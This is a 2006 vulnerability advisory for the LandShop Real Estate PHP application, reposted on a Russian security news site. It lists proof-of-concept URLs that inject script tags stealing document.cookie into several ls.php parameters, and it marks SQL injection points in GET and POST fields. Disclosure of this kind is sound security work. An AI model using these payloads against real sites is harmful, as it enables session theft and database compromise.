Информационная безопасность

Уведомление о безопасности: LandShop Real Estate [multiple injection sql & xss]
back  новости / статьи / форум / программы / реклама / поиск / эксплоиты  forward
[RU] switch to
English Version



Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Wheatblog [multiple xss (post) & full path disclosure]

  bitweaver <=1.3.1 [injection sql (post) & xss (post)]

  omnistar article manager [multiples injection sql]

From:laurent gaffié <saps.audit_(at)_gmail.com>
Date:10 ноября 2006 г.
Subject:LandShop Real Estate [multiple injection sql & xss]

vendor site: http://www.landshop.gr/
product: LandShop Real Estate
bug: multiple injection sql & xss
risk : high

xss (get) :
http://site.com/PATH/action/ls.php?lang=en&action=list&start=</textare
a>'"><script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=</textarea>'"><script>alert(document.
cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=</textarea>'"><script>alert(document.
cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=&search_area=</textarea>'"><script>ale
rt(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=&search_area=&search_type=</textarea>'">
<script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=&search_area=&search_type=&infield=</textarea>'
"><script>alert(document.cookie)</script>
http://site.com/PATH/action/ls.php?lang=en&action=list&start=20&CAT_I
D=1&keyword=&search_area=&search_type=&search_order=</textarea
>'"><script>alert(document.cookie)</script>



injection sql ( get ) :

http://site.com/PATH/action/ls.php?lang=en&action=list&start=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=&search_area=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=0&CAT_ID
=1&keyword=&search_area=&search_type=[sql]
http://site.com/PATH/action/ls.php?lang=en&action=list&start=20&CAT_I
D=1&keyword=&search_area=&search_type=&search_order=[sql]


injection sql ( post ):

http://site.com/PATH/action/ls.php
variables =
/PATH/action/ls.
php?lang=en&action=list&CAT_ID=1&keyword=1&infield=[sql]

http://site.com/PATH/action/ls.php
variables =
/PATH/action/ls.
php?lang=en&action=list&CAT_ID=1&keyword=1&infield=all
&search_area=[sql]

laurent gaffiй & benjamin mossй
http://s-a-p.ca/
contact: saps.audit@gmail.com
О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород

 


Rating@Mail.ru